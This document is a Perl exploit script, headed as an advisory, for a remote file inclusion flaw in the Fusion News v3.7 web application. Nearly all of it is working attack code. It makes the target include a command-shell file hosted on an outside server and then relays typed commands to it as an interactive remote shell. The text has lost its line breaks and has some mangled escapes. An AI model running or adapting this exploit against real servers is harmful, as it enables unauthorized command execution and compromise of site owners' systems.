#!/usr/bin/perl ########################################################################################### # Aria-Security.net Advisory # # Discovered by: OUTLAW # # < www.Aria-security.net > # # Gr33t to: A.u.r.a & HessamX & Cl0wn & DrtRp # # Special Thanx To All Aria-Security Users # ########################################################################################### use LWP::UserAgent; print "n === Fusion News v3.7 Remote File Inclusionn"; print "n === Discovered by OutLaw .n"; print "n === www.Aria-Security.Netn"; $bPath = $ARGV[0]; $cmdo = $ARGV[1]; $bcmd = $ARGV[2]; if($bPath!~/http:/// || $cmdo!~/http:/// || !$bcmd){usage()} while() { print "[Shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$bpath.'index.php?fpath='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "n Could not connect !n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[n]/[&#234;]/; if (!$cmd) {print "nPlease type a Commandnn"; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/) {print "n Could Not Connect to cmd Hostn";exit} elsif ($return =~/^<b>Fatal.error/) {print "n Invalid Commandn"} if($return =~ /(.*)/) { $freturn = $1; $freturn=~ tr/[&#234;]/[n]/; print "rn$freturnnr"; last; } else {print "[Shell] $";}}}last; sub usage() { print " Usage : fusion.pl [host] [cmd shell location] [cmd shell variable]n"; print " Example : fusion.pl http://fusionnews.com http://www.shell.com/cmd.txt cmdn"; exit(); }